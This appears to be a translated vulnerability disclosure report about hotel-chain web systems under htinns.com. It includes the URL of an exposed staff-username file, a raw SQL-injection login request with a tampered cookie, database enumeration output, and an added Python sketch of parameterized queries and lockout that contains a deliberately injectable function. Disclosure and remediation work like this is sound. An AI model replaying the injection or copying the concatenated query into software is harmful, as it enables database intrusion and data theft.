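2014-03-14: Details reported to the vendor; awaiting vendor handling
2014-03-15: Vendor confirmed; details disclosed to the vendor only
2014-03-25: Details disclosed to core white hats and experts in related fields
2014-04-04: Details disclosed to regular white hats
2014-04-14: Details disclosed to intern white hats
2014-04-28: Details disclosed to the public

#1. Information disclosure: a large number of user email usernames are exposed here, in a 6 MB TXT file. Collecting these usernames makes it possible to brute-force the admin back end, because the back end has no CAPTCHA and no limit on failed login attempts.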
http://jcxt.htinns.com/mail.txt
A few examples are listed below:
#2. A POST injection:

POST /exam2/login.asp?win= HTTP/1.1
Host: training.htinns.com
Proxy-Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://training.htinns.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://training.htinns.com/exam2/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: Hm_lvt_e5770a47472445b3f839a58a32b8abe5=1394799212; Hm_lpvt_e5770a47472445b3f839a58a32b8abe5=1394799385; ASPSESSIONIDCSAQQQQQ=APGAMJPALKBMAOBPDBGIMADM; id=admin%27; %2Fbbs%2FGROUP=1

username=admin&password=admin&czbz=1

available databases [48]:
[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0
[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618
[*] dbcenter
[*] dnt31
[*] eCell6
[*] Exam1
[*] HT_eProcurement
[*] HTFranchisee
[*] HtinnsAdviser
[*] HTIntranetUAT
[*] HTScore
[*] InnInspection
[*] InspectionAudit
[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972
[*] master
[*] model
[*] msdb
[*] OA
[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509
[*] PnCheck
[*] PurchaseSurvey
[*] RCTIDB
[*] ReportServer
[*] ReportServerTempDB
[*] ROOMCHK
[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475
[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9
[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccb
[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4
[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5
[*] SharePoint_Config
[*] slam
[*] StateService_23c5611220344b52bea83c8d6fd7ddc8
[*] tempdb
[*] test
[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0
[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab
[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735
[*] USERPLUS
[*] VHArchives_HanTing
[*] WebAnalyticsService????_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186
[*] WebAnalyticsService????_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43
[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333
[*] WSS_Content
[*] WSS_Content_90
[*] WSS_Content_b3117e51d8c8405888a80388555ec208
[*] WSS_Logging
[*] YunYing

database management system users [2]:
[*] PowerExamUser
[*] sa

Database: Exam1
[41 tables]
+--------------------+
| dbo.BbsClass       |
| dbo.BbsMain        |
| dbo.Cjdxm          |
| dbo.Denglu         |
| dbo.Fenzu          |
| dbo.Fenzu_Renyuan  |
| dbo.Ftp_Cs         |
| dbo.Ftp_Kc         |
| dbo.Glyftpqx       |
| dbo.ImgKu          |
| dbo.Kaoshi_Detail  |
| dbo.Kaoshi_Master  |
| dbo.Kaoshi_daan    |
| dbo.Kc_Main        |
| dbo.Kc_Ren         |
| dbo.Kc_lb          |
| dbo.Ksj_Cl         |
| dbo.Ksj_Cl_Temp    |
| dbo.Ksj_Gd_Detail  |
| dbo.Ksj_Main       |
| dbo.Ksj_Ren        |
| dbo.Mrfz           |
| dbo.OperLog        |
| dbo.Reninfoset     |
| dbo.Renyuan        |
| dbo.RenyuanInfo    |
| dbo.ScoreView      |
| dbo.Sjglqx         |
| dbo.TZ             |
| dbo.TiKu_Detail    |
| dbo.Tiku_Main      |
| dbo.Tkj            |
| dbo.Tkjgl          |
| dbo.Tmlb           |
| dbo.Txfs           |
| dbo.Txsx           |
| dbo.Txxz           |
| dbo.UserExamRecord |
| dbo.Userinfo       |
| dbo.Zhsz           |
| dbo.dtproperties   |
+--------------------+
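
Both findings come down to the login handler: form input reaching the SQL text (#2) and no limit on failed attempts (#1). The sketch below is an added example, not code from the report or the vendor; it uses in-memory SQLite as a stand-in for the real database, and the schema, the sample account and the 5-failures-per-15-minutes policy are assumptions.

```python
import hashlib, hmac, os, sqlite3, time

MAX_FAILS, WINDOW = 5, 900  # assumed policy: 5 failures per account per 15 minutes

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # In-memory SQLite stands in for the real back end; schema and sample user are constructed.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (username TEXT PRIMARY KEY, salt BLOB, pwhash BLOB)")
    conn.execute("CREATE TABLE failed_login (username TEXT, ts REAL)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO userinfo VALUES (?, ?, ?)",
                 ("admin", salt, _hash("constructed-sample-pw", salt)))
    return conn

def lookup_concatenated(conn, username):
    # Weak pattern: form input is pasted into the SQL text, so a quote alters the statement.
    sql = "SELECT salt, pwhash FROM userinfo WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()

def lookup_parameterized(conn, username):
    # Corrected pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT salt, pwhash FROM userinfo WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()

def login(conn, username, password, now=None):
    now = time.time() if now is None else now
    fails = conn.execute(
        "SELECT COUNT(*) FROM failed_login WHERE username = ? AND ts > ?",
        (username, now - WINDOW)).fetchone()[0]
    if fails >= MAX_FAILS:
        return "locked"  # refused before the password is even checked
    row = lookup_parameterized(conn, username)
    salt, stored = row if row else (b"\0" * 16, b"")
    candidate = _hash(password, salt)  # computed for unknown users too
    if row is not None and hmac.compare_digest(candidate, stored):
        conn.execute("DELETE FROM failed_login WHERE username = ?", (username,))
        return "ok"
    conn.execute("INSERT INTO failed_login VALUES (?, ?)", (username, now))
    return "denied"

if __name__ == "__main__":
    db = make_db()
    print(lookup_parameterized(db, "admin'"))  # quote treated as plain data
    print([login(db, "admin", "wrong", now=float(t)) for t in range(6)])
```

Per-account lockout can itself be used to lock out legitimate users, so in practice it is usually combined with per-source throttling or a CAPTCHA after the first few failures.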
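
Severity: High
Vulnerability Rank: 15
Confirmed at: 2014-03-15 16:32
Thanks for your attention! This has been forwarded to the relevant team for follow-up. Thank you!
2014-04-09: The vulnerability has been closed. Thank you!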